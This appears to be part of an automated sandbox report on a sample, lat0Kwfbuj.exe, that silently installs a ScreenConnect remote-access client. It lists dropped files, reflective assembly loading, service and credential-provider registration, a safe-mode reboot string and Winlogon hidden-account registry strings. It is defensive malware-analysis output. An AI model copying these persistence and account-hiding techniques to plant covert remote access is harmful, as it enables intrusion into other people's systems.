                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: lat0Kwfbuj.exe
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: lat0Kwfbuj.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: lat0Kwfbuj.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2245197043.000000000029D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: lat0Kwfbuj.exe, MSI8C55.tmp.3.dr, 488619.msi.3.dr, MSI884C.tmp.3.dr, 48861b.msi.3.dr, MSI888B.tmp.3.dr, setup.msi.0.dr, 48861a.rbs.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: lat0Kwfbuj.exe, MSI805D.tmp.2.dr, 488619.msi.3.dr, 48861b.msi.3.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611213053.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: lat0Kwfbuj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: lat0Kwfbuj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: lat0Kwfbuj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: lat0Kwfbuj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.lat0Kwfbuj.exe.1350000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.lat0Kwfbuj.exe.104bcf4.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: lat0Kwfbuj.exeStatic PE information: real checksum: 0x550b20 should be: 0x56ebd1
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_01276F00 push eax; mov dword ptr [esp], ecx0_2_01276F11
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_01271817 push esp; ret 0_2_01271821
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_055E3A78 pushad ; iretd 0_2_055E3AA1
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_070277E2 push esp; ret 5_3_070277E9
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_04646B35 push esp; iretd 8_2_04646B39
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EE185A push eax; iretd 8_2_05EE1865
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EE3F60 pushad ; ret 8_2_05EE3F73
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EFBE48 pushad ; retf 8_2_05EFBE49
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E56E9 push esp; ret 9_2_00007FFD340E5703
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E792B push ebx; retf 9_2_00007FFD340E796A
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E7928 push ebx; retf 9_2_00007FFD340E796A
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340F631A pushad ; ret 9_2_00007FFD340F631D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340D7BE9 push cs; ret 9_2_00007FFD340D7BEF
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340D8440 pushad ; ret 9_2_00007FFD340D845D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340B37F0 push eax; retf 10_2_00007FFD340B37FD
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343C9848 push cs; iretd 10_2_00007FFD343C9C2F
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343C99AC push cs; iretd 10_2_00007FFD343C9C2F
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343C27A1 push ss; iretd 10_2_00007FFD343C27A8

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-a44d-4392d823459f}\inprocserver32
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI888B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C55.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI805D.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI888B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C55.tmpJump to dropped file
                              Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: rundll32.exe, 00000005.00000003.2221560120.0000000004B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2621103278.000000001BE42000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: lat0Kwfbuj.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
